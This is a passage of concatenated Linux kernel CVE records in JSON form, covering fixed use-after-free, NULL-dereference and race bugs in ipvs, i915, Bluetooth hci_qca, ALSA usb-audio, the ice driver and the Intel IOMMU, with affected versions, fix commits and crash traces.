{
"lessThan": "b2c664df3bb46aabac6a5fd78aaa5bd614cfad97",
"status": "affected",
"version": "39b9722315364121c6e2524515a6e95d52287549",
"versionType": "git"
},
{
"lessThan": "3dd428039e06e1967ce294e2cd6342825aaaad77",
"status": "affected",
"version": "39b9722315364121c6e2524515a6e95d52287549",
"versionType": "git"
},
{
"lessThan": "c420cd5d5bc6797f3a8824e7d74f38f0c286fca5",
"status": "affected",
"version": "39b9722315364121c6e2524515a6e95d52287549",
"versionType": "git"
},
{
"lessThan": "cbd070a4ae62f119058973f6d2c984e325bce6e7",
"status": "affected",
"version": "39b9722315364121c6e2524515a6e95d52287549",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/netfilter/ipvs/ip_vs_ctl.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.7"
},
{
"lessThan": "4.7",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.237",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.181",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.119",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.44",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.10.*",
"status": "unaffected",
"version": "6.10.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.11",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.237",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.181",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.119",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.44",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10.3",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.11",
"versionStartIncluding": "4.7",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nipvs: properly dereference pe in ip_vs_add_service\n\nUse pe directly to resolve sparse warning:\n\n net/netfilter/ipvs/ip_vs_ctl.c:1471:27: warning: dereference of noderef expression"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:26:49.676Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/36c997f1e03601475ad0fda0e0f59b7a209e756b"
},
{
"url": "https://git.kernel.org/stable/c/211168339657f36f32fb597afd0e3ac82d726119"
},
{
"url": "https://git.kernel.org/stable/c/b2c664df3bb46aabac6a5fd78aaa5bd614cfad97"
},
{
"url": "https://git.kernel.org/stable/c/3dd428039e06e1967ce294e2cd6342825aaaad77"
},
{
"url": "https://git.kernel.org/stable/c/c420cd5d5bc6797f3a8824e7d74f38f0c286fca5"
},
{
"url": "https://git.kernel.org/stable/c/cbd070a4ae62f119058973f6d2c984e325bce6e7"
}
],
"title": "ipvs: properly dereference pe in ip_vs_add_service",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-42322",
"datePublished": "2024-08-17T09:09:34.295Z",
"dateReserved": "2024-07-30T07:40:12.279Z",
"dateUpdated": "2025-05-04T09:26:49.676Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52913 (GCVE-0-2023-52913)
Vulnerability from cvelistv5
Published
2024-08-21 06:10
Modified
2025-05-04 07:45
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
drm/i915: Fix potential context UAFs
gem_context_register() makes the context visible to userspace, and which
point a separate thread can trigger the I915_GEM_CONTEXT_DESTROY ioctl.
So we need to ensure that nothing uses the ctx ptr after this. And we
need to ensure that adding the ctx to the xarray is the *last* thing
that gem_context_register() does with the ctx pointer.
[tursulin: Stable and fixes tags add/tidy.]
(cherry picked from commit bed4b455cf5374e68879be56971c1da563bcd90c)
References
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52913",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:34:42.812004Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:12.564Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/i915/gem/i915_gem_context.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "ae278887193110dfeb857ea63e243a3851fbb0bc",
"status": "affected",
"version": "eb4dedae920a07c485328af3da2202ec5184fb17",
"versionType": "git"
},
{
"lessThan": "b696c627b3f56e173f7f70b8487d66da8ff22506",
"status": "affected",
"version": "eb4dedae920a07c485328af3da2202ec5184fb17",
"versionType": "git"
},
{
"lessThan": "afce71ff6daa9c0f852df0727fe32c6fb107f0fa",
"status": "affected",
"version": "eb4dedae920a07c485328af3da2202ec5184fb17",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/i915/gem/i915_gem_context.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.10"
},
{
"lessThan": "5.10",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.171",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.7",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.171",
"versionStartIncluding": "5.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.7",
"versionStartIncluding": "5.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.2",
"versionStartIncluding": "5.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/i915: Fix potential context UAFs\n\ngem_context_register() makes the context visible to userspace, and which\npoint a separate thread can trigger the I915_GEM_CONTEXT_DESTROY ioctl.\nSo we need to ensure that nothing uses the ctx ptr after this. And we\nneed to ensure that adding the ctx to the xarray is the *last* thing\nthat gem_context_register() does with the ctx pointer.\n\n[tursulin: Stable and fixes tags add/tidy.]\n(cherry picked from commit bed4b455cf5374e68879be56971c1da563bcd90c)"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:45:53.628Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/ae278887193110dfeb857ea63e243a3851fbb0bc"
},
{
"url": "https://git.kernel.org/stable/c/b696c627b3f56e173f7f70b8487d66da8ff22506"
},
{
"url": "https://git.kernel.org/stable/c/afce71ff6daa9c0f852df0727fe32c6fb107f0fa"
}
],
"title": "drm/i915: Fix potential context UAFs",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52913",
"datePublished": "2024-08-21T06:10:54.540Z",
"dateReserved": "2024-08-21T06:07:11.017Z",
"dateUpdated": "2025-05-04T07:45:53.628Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-48878 (GCVE-0-2022-48878)
Vulnerability from cvelistv5
Published
2024-08-21 06:10
Modified
2025-05-04 08:25
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
Bluetooth: hci_qca: Fix driver shutdown on closed serdev
The driver shutdown callback (which sends EDL_SOC_RESET to the device
over serdev) should not be invoked when HCI device is not open (e.g. if
hci_dev_open_sync() failed), because the serdev and its TTY are not open
either. Also skip this step if device is powered off
(qca_power_shutdown()).
The shutdown callback causes use-after-free during system reboot with
Qualcomm Atheros Bluetooth:
Unable to handle kernel paging request at virtual address
0072662f67726fd7
...
CPU: 6 PID: 1 Comm: systemd-shutdow Tainted: G W
6.1.0-rt5-00325-g8a5f56bcfcca #8
Hardware name: Qualcomm Technologies, Inc. Robotics RB5 (DT)
Call trace:
tty_driver_flush_buffer+0x4/0x30
serdev_device_write_flush+0x24/0x34
qca_serdev_shutdown+0x80/0x130 [hci_uart]
device_shutdown+0x15c/0x260
kernel_restart+0x48/0xac
KASAN report:
BUG: KASAN: use-after-free in tty_driver_flush_buffer+0x1c/0x50
Read of size 8 at addr ffff16270c2e0018 by task systemd-shutdow/1
CPU: 7 PID: 1 Comm: systemd-shutdow Not tainted
6.1.0-next-20221220-00014-gb85aaf97fb01-dirty #28
Hardware name: Qualcomm Technologies, Inc. Robotics RB5 (DT)
Call trace:
dump_backtrace.part.0+0xdc/0xf0
show_stack+0x18/0x30
dump_stack_lvl+0x68/0x84
print_report+0x188/0x488
kasan_report+0xa4/0xf0
__asan_load8+0x80/0xac
tty_driver_flush_buffer+0x1c/0x50
ttyport_write_flush+0x34/0x44
serdev_device_write_flush+0x48/0x60
qca_serdev_shutdown+0x124/0x274
device_shutdown+0x1e8/0x350
kernel_restart+0x48/0xb0
__do_sys_reboot+0x244/0x2d0
__arm64_sys_reboot+0x54/0x70
invoke_syscall+0x60/0x190
el0_svc_common.constprop.0+0x7c/0x160
do_el0_svc+0x44/0xf0
el0_svc+0x2c/0x6c
el0t_64_sync_handler+0xbc/0x140
el0t_64_sync+0x190/0x194
References
| URL | Tags | |
|---|---|---|
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-48878",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:05:06.349695Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:32:53.074Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/bluetooth/hci_qca.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "e84ec6e25df9bb0968599e92eacedaf3a0a5b587",
"status": "affected",
"version": "7e7bbddd029b644f00f0ffbfbc485ed71977d0d5",
"versionType": "git"
},
{
"lessThan": "908d1742b6e694e84ead5c62e4b7c1bfbb8b46a3",
"status": "affected",
"version": "7e7bbddd029b644f00f0ffbfbc485ed71977d0d5",
"versionType": "git"
},
{
"lessThan": "ea3ebda47dd56f6e1c62f2e0e1b6e1b0a973e447",
"status": "affected",
"version": "7e7bbddd029b644f00f0ffbfbc485ed71977d0d5",
"versionType": "git"
},
{
"lessThan": "272970be3dabd24cbe50e393ffee8f04aec3b9a8",
"status": "affected",
"version": "7e7bbddd029b644f00f0ffbfbc485ed71977d0d5",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/bluetooth/hci_qca.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.8"
},
{
"lessThan": "5.8",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.165",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.90",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.8",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.165",
"versionStartIncluding": "5.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.90",
"versionStartIncluding": "5.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.8",
"versionStartIncluding": "5.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.2",
"versionStartIncluding": "5.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: hci_qca: Fix driver shutdown on closed serdev\n\nThe driver shutdown callback (which sends EDL_SOC_RESET to the device\nover serdev) should not be invoked when HCI device is not open (e.g. if\nhci_dev_open_sync() failed), because the serdev and its TTY are not open\neither. Also skip this step if device is powered off\n(qca_power_shutdown()).\n\nThe shutdown callback causes use-after-free during system reboot with\nQualcomm Atheros Bluetooth:\n\n Unable to handle kernel paging request at virtual address\n 0072662f67726fd7\n ...\n CPU: 6 PID: 1 Comm: systemd-shutdow Tainted: G W\n 6.1.0-rt5-00325-g8a5f56bcfcca #8\n Hardware name: Qualcomm Technologies, Inc. Robotics RB5 (DT)\n Call trace:\n tty_driver_flush_buffer+0x4/0x30\n serdev_device_write_flush+0x24/0x34\n qca_serdev_shutdown+0x80/0x130 [hci_uart]\n device_shutdown+0x15c/0x260\n kernel_restart+0x48/0xac\n\nKASAN report:\n\n BUG: KASAN: use-after-free in tty_driver_flush_buffer+0x1c/0x50\n Read of size 8 at addr ffff16270c2e0018 by task systemd-shutdow/1\n\n CPU: 7 PID: 1 Comm: systemd-shutdow Not tainted\n 6.1.0-next-20221220-00014-gb85aaf97fb01-dirty #28\n Hardware name: Qualcomm Technologies, Inc. Robotics RB5 (DT)\n Call trace:\n dump_backtrace.part.0+0xdc/0xf0\n show_stack+0x18/0x30\n dump_stack_lvl+0x68/0x84\n print_report+0x188/0x488\n kasan_report+0xa4/0xf0\n __asan_load8+0x80/0xac\n tty_driver_flush_buffer+0x1c/0x50\n ttyport_write_flush+0x34/0x44\n serdev_device_write_flush+0x48/0x60\n qca_serdev_shutdown+0x124/0x274\n device_shutdown+0x1e8/0x350\n kernel_restart+0x48/0xb0\n __do_sys_reboot+0x244/0x2d0\n __arm64_sys_reboot+0x54/0x70\n invoke_syscall+0x60/0x190\n el0_svc_common.constprop.0+0x7c/0x160\n do_el0_svc+0x44/0xf0\n el0_svc+0x2c/0x6c\n el0t_64_sync_handler+0xbc/0x140\n el0t_64_sync+0x190/0x194"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:25:20.527Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/e84ec6e25df9bb0968599e92eacedaf3a0a5b587"
},
{
"url": "https://git.kernel.org/stable/c/908d1742b6e694e84ead5c62e4b7c1bfbb8b46a3"
},
{
"url": "https://git.kernel.org/stable/c/ea3ebda47dd56f6e1c62f2e0e1b6e1b0a973e447"
},
{
"url": "https://git.kernel.org/stable/c/272970be3dabd24cbe50e393ffee8f04aec3b9a8"
}
],
"title": "Bluetooth: hci_qca: Fix driver shutdown on closed serdev",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2022-48878",
"datePublished": "2024-08-21T06:10:09.418Z",
"dateReserved": "2024-07-16T11:38:08.922Z",
"dateUpdated": "2025-05-04T08:25:20.527Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52904 (GCVE-0-2023-52904)
Vulnerability from cvelistv5
Published
2024-08-21 06:10
Modified
2025-05-04 07:45
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
ALSA: usb-audio: Fix possible NULL pointer dereference in snd_usb_pcm_has_fixed_rate()
The subs function argument may be NULL, so do not use it before the NULL check.
References
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52904",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:03:17.931881Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:17.251Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"sound/usb/pcm.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "f57204edc10760c935d8d36ea999dc8acf018030",
"status": "affected",
"version": "bfd36b1d1869859af7ba94dc95ec05e74f40d0b7",
"versionType": "git"
},
{
"lessThan": "a474d4ad59cd4642d1b7e3a6c08cef9eca0992c8",
"status": "affected",
"version": "e1e0a181aea375edfae2f9a59070f95d904980d1",
"versionType": "git"
},
{
"lessThan": "92a9c0ad86d47ff4cce899012e355c400f02cfb8",
"status": "affected",
"version": "291e9da91403e0e628d7692b5ed505100e7b7706",
"versionType": "git"
}
]
},
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"sound/usb/pcm.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "5.15.168",
"status": "affected",
"version": "5.15.152",
"versionType": "semver"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.168",
"versionStartIncluding": "5.15.152",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nALSA: usb-audio: Fix possible NULL pointer dereference in snd_usb_pcm_has_fixed_rate()\n\nThe subs function argument may be NULL, so do not use it before the NULL check."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:45:43.772Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/f57204edc10760c935d8d36ea999dc8acf018030"
},
{
"url": "https://git.kernel.org/stable/c/a474d4ad59cd4642d1b7e3a6c08cef9eca0992c8"
},
{
"url": "https://git.kernel.org/stable/c/92a9c0ad86d47ff4cce899012e355c400f02cfb8"
}
],
"title": "ALSA: usb-audio: Fix possible NULL pointer dereference in snd_usb_pcm_has_fixed_rate()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52904",
"datePublished": "2024-08-21T06:10:44.960Z",
"dateReserved": "2024-08-21T06:07:11.014Z",
"dateUpdated": "2025-05-04T07:45:43.772Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-42107 (GCVE-0-2024-42107)
Vulnerability from cvelistv5
Published
2024-07-30 07:46
Modified
2025-05-04 09:23
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
ice: Don't process extts if PTP is disabled
The ice_ptp_extts_event() function can race with ice_ptp_release() and
result in a NULL pointer dereference which leads to a kernel panic.
Panic occurs because the ice_ptp_extts_event() function calls
ptp_clock_event() with a NULL pointer. The ice driver has already
released the PTP clock by the time the interrupt for the next external
timestamp event occurs.
To fix this, modify the ice_ptp_extts_event() function to check the
PTP state and bail early if PTP is not ready.
References
Impacted products
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T04:54:32.575Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1c4e524811918600683b1ea87a5e0fc2db64fa9b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/996422e3230e41468f652d754fefd1bdbcd4604e"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-42107",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:17:43.025350Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:07.604Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/intel/ice/ice_ptp.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "1c4e524811918600683b1ea87a5e0fc2db64fa9b",
"status": "affected",
"version": "172db5f91d5f7b91670c68a7547798b0b5374158",
"versionType": "git"
},
{
"lessThan": "996422e3230e41468f652d754fefd1bdbcd4604e",
"status": "affected",
"version": "172db5f91d5f7b91670c68a7547798b0b5374158",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/intel/ice/ice_ptp.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.14"
},
{
"lessThan": "5.14",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.9",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.9",
"versionStartIncluding": "5.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "5.14",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nice: Don\u0027t process extts if PTP is disabled\n\nThe ice_ptp_extts_event() function can race with ice_ptp_release() and\nresult in a NULL pointer dereference which leads to a kernel panic.\n\nPanic occurs because the ice_ptp_extts_event() function calls\nptp_clock_event() with a NULL pointer. The ice driver has already\nreleased the PTP clock by the time the interrupt for the next external\ntimestamp event occurs.\n\nTo fix this, modify the ice_ptp_extts_event() function to check the\nPTP state and bail early if PTP is not ready."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:23:09.937Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/1c4e524811918600683b1ea87a5e0fc2db64fa9b"
},
{
"url": "https://git.kernel.org/stable/c/996422e3230e41468f652d754fefd1bdbcd4604e"
}
],
"title": "ice: Don\u0027t process extts if PTP is disabled",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-42107",
"datePublished": "2024-07-30T07:46:02.834Z",
"dateReserved": "2024-07-29T15:50:41.176Z",
"dateUpdated": "2025-05-04T09:23:09.937Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-43903 (GCVE-0-2024-43903)
Vulnerability from cvelistv5
This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.
Show details on NVD website{
"containers": {
"cna": {
"providerMetadata": {
"dateUpdated": "2024-12-19T11:30:47.579Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"rejectedReasons": [
{
"lang": "en",
"value": "This CVE ID has been rejected or withdrawn by its CVE Numbering Authority."
}
]
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-43903",
"datePublished": "2024-08-26T10:11:03.529Z",
"dateRejected": "2024-12-19T11:30:47.579Z",
"dateReserved": "2024-08-17T09:11:59.292Z",
"dateUpdated": "2024-12-19T11:30:47.579Z",
"state": "REJECTED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-27079 (GCVE-0-2024-27079)
Vulnerability from cvelistv5
Published
2024-05-01 13:04
Modified
2025-05-04 09:03
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
iommu/vt-d: Fix NULL domain on device release
In the kdump kernel, the IOMMU operates in deferred_attach mode. In this
mode, info->domain may not yet be assigned by the time the release_device
function is called. It leads to the following crash in the crash kernel:
BUG: kernel NULL pointer dereference, address: 000000000000003c
...
RIP: 0010:do_raw_spin_lock+0xa/0xa0
...
_raw_spin_lock_irqsave+0x1b/0x30
intel_iommu_release_device+0x96/0x170
iommu_deinit_device+0x39/0xf0
__iommu_group_remove_device+0xa0/0xd0
iommu_bus_notifier+0x55/0xb0
notifier_call_chain+0x5a/0xd0
blocking_notifier_call_chain+0x41/0x60
bus_notify+0x34/0x50
device_del+0x269/0x3d0
pci_remove_bus_device+0x77/0x100
p2sb_bar+0xae/0x1d0
...
i801_probe+0x423/0x740
Use the release_domain mechanism to fix it. The scalable mode context
entry which is not part of release domain should be cleared in
release_device().
References
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-27079",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-28T17:45:27.745235Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:46:28.295Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:27:57.800Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/333fe86968482ca701c609af590003bcea450e8f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/81e921fd321614c2ad8ac333b041aae1da7a1c6d"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/iommu/intel/iommu.c",
"drivers/iommu/intel/pasid.c",
"drivers/iommu/intel/pasid.h"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
